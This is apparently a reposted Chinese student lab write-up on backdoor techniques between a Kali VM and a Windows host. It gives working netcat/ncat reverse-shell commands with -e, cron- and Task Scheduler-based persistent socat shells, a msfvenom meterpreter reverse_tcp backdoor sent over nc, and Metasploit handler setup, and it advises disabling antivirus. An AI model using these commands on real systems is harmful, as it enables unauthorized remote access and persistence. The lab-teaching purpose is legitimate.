ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

后门原理与实践

2022-03-29 15:35:07  阅读:215  来源: 互联网

标签:后门 exe Windows 主机 1218 cmd 实践 原理 输入


1.1.1 Win获得Linux Shell

Step0:首先查看windows主机和kali的IP地址

Step0.1:在kali的终端输入 ifconfig 查看当前kali的IP地址,如下图所示

 

 

 

 

 Step0.2:在kali的终端输入 ipconfig 查看当前Windows主机当前的IP地址,如下图所示

 

 

Step1:windows 打开监听

在cmd.exe下输入 ncat.exe -l -p 8330

 

 

 

Step2:Linux反弹连接win

输入 nc 172.16.277.49 8330 -e /bin/sh

Step3:windows下获得一个linux shell,可运行任何指令,如ls

 

成功!但是输出乱码,应该是字符编码问题,我们需要修改一下字符编码

Step4:修改字符编码

在cmd.exe输入 cd c:\windows\ststem32 

之后输入 chcp 65001 更改字符编码为UTF-8

成功之后会显示如下图所示:

 

注意:这种方法只是临时更改,永久修改需要修改注册表。

此时重新在Windows打开监听,在Linux反弹连接Windows,输入 ls 命令,成功!

 

 

在虚拟机中获取主机shell

在虚拟机中用nc -l -p 1218监听主机1218端口

 

 

在主机中用ncat -e cmd 192.168.174.141 1218

 

 

 成功获取到主机shell

 

 

在虚拟机中启动cron并在主机监听

先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)

 

 

等到每小时的34分,在ip地址为192.168.1.105的主机端用ncat -l -p 1218打开监听即可

 

 

 

二、使用socat获取主机操作Shell,任务计划启动

在Windows获得Linux Shell

在Kali中用man socat查看使用说明

 

 

 在Windows中按Win+R,再输入compmgmt.msc打开计算机管理

在系统工具中的任务计划程序中创建任务

 

 

设置任务名称

 

新建触发器

 

 

 

下一步是新建操作,但在新建操作前,我们需要在Windows上下载socat.rar,并解压后使用,使用参考README

新建操作,操作设置为启动程序socat.exe,并添加参数tcp-listen:1218 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口1218,同时把cmd.exe的stderr重定向

创建完成之后,按 Windows+L 快捷键锁定计算机,再次打开时,双击 任务计划程序库 可以发现之前创建的任务已经开始运行

 

 

 

 

 

 

 

 

 

Step4:在kali中输入 socat - tcp:172.16.227.49:8330 (-代表标准的输入输出,第二个流连接到Windows主机的 8330 端口,IP为win的IP),成功获得 cmd shell )

 

输入 dir 进行测试,成功输出

 

 

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali上生成后门可执行程序20191218_backdoor.exe

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218_backdoor.exe,其中

    • LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
    • LPORT是回连的端口
    • -p 使用的payload。
      payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
    • -f 生成文件的类型
    • > 输出到哪个文件

 

 

 

 

 在Windows上打开监听

 

 在Kali上用nc 192.168.1.105 1218 < 20191218_backdoor.exe将生成的20191218_backdoor.exe后门程序传过去

 

 

 

在kali上使用msfconsole指令进入msf控制台

 

 对msf控制台进行配置
依次输入以下命令

use exploit/multi/handler        #使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp        #使用和生成后门程序时相同的payload
set LHOST 192.168.174.141            #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1218

 

配置完后的情况

 

 接着输入exploit进行监听,在Windows在打开20191218_backdoor.exe后成功获取到Windows的shell(注意最好把所有杀毒软件退出,否则打开后门程序时很容易出现拒绝访问的情况)

 

标签:后门,exe,Windows,主机,1218,cmd,实践,原理,输入
来源: https://www.cnblogs.com/Drewf/p/16072008.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有